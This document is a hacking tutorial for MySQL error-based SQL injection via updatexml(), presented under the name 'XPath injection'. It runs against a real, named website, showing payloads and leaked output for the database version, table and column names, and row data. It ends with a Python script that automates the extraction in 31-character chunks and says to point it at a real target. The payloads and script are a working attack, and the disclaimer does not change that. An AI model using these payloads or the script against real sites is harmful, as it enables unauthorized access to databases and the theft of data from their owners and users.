Xpath Injection Tutorial | SQL Injection

Xpath Injection Tutorial | Xpath Injection Using Updatexml()

Short Introduction:

Similar to SQL injection, XPath injection targets websites that use user-supplied input to build an XPath query over XML data. XPath injection can be even more dangerous than SQL injection, because XPath has no access control: an attacker can query the whole XML document, whereas most SQL databases have meta tables that regular queries cannot read.

One thing to get straight before the tutorial: what follows is not XPath injection against an XML document. It is MySQL error-based SQL injection. updatexml() takes an XPath expression as its second argument, and when that expression is invalid MySQL throws 'XPATH syntax error' and echoes the expression back in the message. By putting the result of a subquery into that argument, prefixed with 0x3a (a colon, which no valid XPath expression starts with), we make MySQL print whatever we want in its error. The 'XPATH' in the error text is the only reason this technique is commonly called XPath injection.

Quick Tutorial On Xpath Injection: (Basic Injection, From Noob To Leet)

Checking Vulnerability:-

http://www.plantandem.be/home.php?p=g&id=4'
Vulnerable, as we can see from the error. The single quote breaks the SQL syntax, and because the page shows the database error to the visitor, error-based extraction with updatexml() will work here. (If errors were not displayed, you would need blind techniques instead.)

Get Version:-
http://www.plantandem.be/home.php?p=g&id=4 and updatexml(0x3a,concat(0x3a,version()),null)--

RESULT : XPATH syntax error: ':5.1.73-1+deb6u1-log'

The MySQL version (5.1.73) lands in the error message because concat(0x3a,version()) is passed as the XPath expression, and an expression starting with ':' is not valid XPath. updatexml() parses that argument before it touches the other two, so the first and third arguments can be anything (0x3a or null). One caveat about the trailing '--': MySQL only treats '--' as a comment when whitespace follows it, and a trailing space is lost in a URL, so use '--+' or '-- -' (or '%23', a '#' comment) if the bare '--' gives you a syntax error.

Get Tables:-

http://www.plantandem.be/home.php?p=g&id=4 and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--

So the first table is:
Result :: XPATH syntax error: ':actu'

For the other tables, increase 'limit 0,1' to 'limit 1,1', then 'limit 2,1', 'limit 3,1' and so on, one table per request. When the page loads normally with no error, the subquery returned no row, which means there are no more tables in the current database (database() only covers the current schema). You can also get them all in one request with group_concat(table_name) instead of table_name, keeping in mind that the error message only shows the first 32 characters.

Then you can choose any table name and get its columns.

I am choosing this table: 'actu'

OK, so now let's enumerate its columns.

To get the columns we use this query. The table name goes in as a hex literal (0x followed by the hex of the name), so no quotes are needed and quote filtering such as addslashes() cannot break the injection:
www.example.com/file.php?id=1 and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x[hex of table name here] limit 0,1)),null)--

Like This :

http://www.plantandem.be/home.php?p=g&id=4 and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x61637475 limit 0,1)),null)--

Result : 

XPATH syntax error: ':id'

OK, so the first column of this table is 'id' (0x61637475 is just 'actu' in hex). For the rest of the columns, keep changing the limit.


Like This . :-

http://www.plantandem.be/home.php?p=g&id=4 and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name=0x61637475 limit 1,1)),null)--

Result : XPATH syntax error: ':auteur' ( Second Column )

Now the last step: dumping the data.

For dumping data we use:

www.example.com/file.php?id=1 and updatexml(null,concat(0x3a,(select concat([column names here]) from [table name here] limit 0,1)),null)--

The table name is not quoted, and the columns are joined with a separator so you can tell them apart in the output.

Like This :-

http://www.plantandem.be/home.php?p=g&id=4 and updatexml(null,concat(0x3a,(select concat(id,0x203a20,auteur) from actu limit 0,1)),null)--
0x203a20 = ' : ' (a separator so the two columns don't run together)

Result : XPATH syntax error: ':10 : Webmaster'

So the first row of actu has id = 10 and auteur = 'Webmaster'. Increase the limit to walk through the rows.

Do the same for all columns and tables, and check the table and column names carefully. One limitation: the error message carries at most 32 characters (one of them is our ':'), so a longer value is cut off. Pull it out in pieces with substring(): substring((select ...),1,31), then substring((select ...),32,31), and so on.
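The whole procedure above, automated, as an added example that is not code from the original post. It builds the same payloads the tutorial types by hand, pulls the leaked value out of MySQL's 'XPATH syntax error' message, and reassembles values longer than the 32 characters MySQL puts in that message by walking them with substring(). FakeMySQLOracle is a constructed in-memory stand-in for the vulnerable page (it returns the values shown in the tutorial plus one constructed long value); hex_literal, build_payload, parse_leak and extract_value are this example's own names, not anything from the page.

```python
"""Error-based MySQL extraction through updatexml(), automated.

Added example, not code from the original tutorial. FakeMySQLOracle is a
constructed stand-in for the vulnerable page; hex_literal, build_payload,
parse_leak and extract_value are names chosen for this example."""
import re
from typing import Callable, Dict, Optional

ERR_WINDOW = 32          # MySQL echoes at most 32 chars of the bad XPath
CHUNK = ERR_WINDOW - 1   # one is spent on the ':' (0x3a) that breaks the XPath
LEAK_RE = re.compile(r"XPATH syntax error: ':(.*?)'")


def hex_literal(s: str) -> str:
    """'actu' -> '0x61637475': a string literal that needs no quotes."""
    return "0x" + s.encode().hex()


def build_payload(subquery: str) -> str:
    """Suffix for a numeric parameter such as id=4. updatexml() parses its
    XPath argument before touching the other two, so NULL is fine for them.
    '-- -' rather than a bare '--': MySQL only treats '--' as a comment when
    whitespace follows it, and a URL would drop a trailing space."""
    return f" and updatexml(null,concat(0x3a,({subquery})),null)-- -"


def parse_leak(body: str) -> Optional[str]:
    """Text between the quotes of the error, or None when the page rendered
    normally (the subquery returned NULL or no row)."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def extract_value(expr: str, send: Callable[[str], str]) -> Optional[str]:
    """Leak the full result of `expr` by walking it with substring() in
    31-char windows. `send` submits one payload and returns the response."""
    out, offset = "", 1  # MySQL substring() offsets are 1-based
    while True:
        window = f"substring(({expr}),{offset},{CHUNK})"
        piece = parse_leak(send(build_payload(window)))
        if piece is None:
            return None if offset == 1 else out
        out += piece
        if len(piece) < CHUNK:      # short window: nothing left to fetch
            return out
        offset += CHUNK


class FakeMySQLOracle:
    """Constructed mock of the vulnerable page: maps subqueries to results and
    imitates MySQL (NULL -> normal page, else error truncated to 32 chars)."""
    SUB_RE = re.compile(r"substring\(\((.+)\),(\d+),(\d+)\)$")
    BODY_RE = re.compile(r"concat\(0x3a,\((.*)\)\),null\)-- -$")

    def __init__(self, results: Dict[str, Optional[str]]):
        self.results = results

    def send(self, payload: str) -> str:
        inner = self.BODY_RE.search(payload).group(1)
        sub = self.SUB_RE.fullmatch(inner)
        if sub:
            value = self.results.get(sub.group(1))
            off, length = int(sub.group(2)), int(sub.group(3))
            if value is not None:
                value = value[off - 1:off - 1 + length]
        else:
            value = self.results.get(inner)
        if value is None:
            return "<html><body>normal page</body></html>"
        return "XPATH syntax error: '" + (":" + value)[:ERR_WINDOW] + "'"


TABLES = "select table_name from information_schema.tables where table_schema=database()"
COLUMNS = ("select column_name from information_schema.columns where "
           "table_schema=database() and table_name=" + hex_literal("actu"))
ALL_TABLES = "select group_concat(table_name) from information_schema.tables where table_schema=database()"

# Results taken from the tutorial, plus one constructed long value so the
# 32-character limit is actually exercised.
ORACLE = FakeMySQLOracle({
    "version()": "5.1.73-1+deb6u1-log",
    TABLES + " limit 0,1": "actu",
    TABLES + " limit 1,1": None,          # no second row: page loads normally
    COLUMNS + " limit 0,1": "id",
    COLUMNS + " limit 1,1": "auteur",
    "select concat(id,0x203a20,auteur) from actu limit 0,1": "10 : Webmaster",
    ALL_TABLES: "actu,constructed_table_two,constructed_table_three",  # constructed
})


def run_tutorial() -> Dict[str, Optional[str]]:
    """Every step of the tutorial against the mock, keyed by subquery."""
    steps = ["version()", TABLES + " limit 0,1", TABLES + " limit 1,1",
             COLUMNS + " limit 0,1", COLUMNS + " limit 1,1",
             "select concat(id,0x203a20,auteur) from actu limit 0,1", ALL_TABLES]
    return {s: extract_value(s, ORACLE.send) for s in steps}


if __name__ == "__main__":
    for step, value in run_tutorial().items():
        print(f"{step[:55]:<55} -> {value!r}")
```

Against a real target, replace ORACLE.send with a function that sends the payload appended to the vulnerable parameter and returns the response body; extract_value() will then fetch each value in as many requests as its length needs, and a None result means the page came back without an error, i.e. the row you asked for does not exist.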

Note : This Is Purely For Sharing Knowledge . We Are Not Responsible For Action Performed By You.

Thanks For Reading ..